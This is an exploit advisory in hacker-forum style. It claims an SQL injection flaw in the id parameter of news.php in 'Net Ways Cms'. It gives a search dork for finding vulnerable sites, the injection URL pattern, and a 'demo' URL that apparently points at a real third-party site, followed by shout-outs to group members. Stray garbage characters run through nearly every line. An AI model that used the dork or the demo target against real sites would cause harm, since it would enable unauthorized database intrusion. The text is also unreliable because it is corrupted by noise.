################################################################################??######## ' t# Y" \9 k _
# # x. Z- k$ w T3 I' Y
# Exploit Title : Net Ways Cms Sql Injection Vulnerability
1 v3 j& Y) }% j2 v/ R1 I% v. O# : L1 [0 T7 J2 l: ?
# Author : IrIsT.Ir
% J+ L0 _( ~/ ?% t# l3 e# $ h4 Z0 V6 {2 B- ?, O7 b
# Discovered By : Am!r , J1 m2 I$ n. M( ^' q: R d9 Z
# % x$ X) ]( ?8 K4 g9 Q7 Q
# Home : http://IrIsT.Ir/forum / x9 P& Y0 |4 q% W# p8 _- Y: w
# 7 T# E. B. H _
# Software Link : http://www.netways.com/ www.political-security.com' I. z/ ]8 _& s4 K
# + J( s5 N" l) N, _% i
# Security Risk : High 6 a$ v) Z2 |9 b1 m. {, n
# 3 |! x1 }& _/ c- V
# Version : All Version $ C6 a1 F9 @" P# s `( m$ s
#
+ r8 A' ~8 f t v, ^4 {# Tested on : GNU/Linux Ubuntu - Windows Server - win7 s$ x. Y( A5 W9 K8 e
#
; [! E) d9 h% i! x, ] g# Dork : intext:"Designed & developed by NetWays" / p P" P! F! Z, O8 K( F
# 4 l4 I3 e, U: z
################################################################################??######## # D) h6 K/ U8 y, X" E6 O: a
#
3 N0 C- N2 x; a/ `) M- `9 B# Expl0iTs :
5 C* P, s* ~' g#
, v+ {7 [5 p6 h' Y7 Q- h/ S# http://target.com/news.php?id=[Sql]
" G9 D( d/ c8 Z2 u2 ], q0 a# % W. p8 P, x7 q
# 0 D1 u3 o/ l, d1 T. J2 \# v
# D3mo : ' H) C3 ?2 P" x1 t, V. y
#
" i. D/ }0 @5 n1 R6 u N# http://compagnieparento.com/news.php?id=7[Sql]
- Z! t( ?8 g+ h9 f) i: N#
) Q* c1 ~& D# C8 ~' b' T; d" k################################################################################??########
3 i8 Y* E1 y0 ~3 a% u& E" N# U( g#
6 T3 h! N. Y8 `+ V3 r# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
: @9 ^9 c" `; [3 g1 `" V: v#
! E2 w3 w! `1 p( M9 D! o9 o# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r 8 T. g4 N" i J7 Y3 v. a
#
- P0 S5 r* m6 n4 J; `# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
, _3 z* Z2 H B1 V$ @# 3 _' i. ?+ D: J% g0 M6 Q
################################################################################??######## |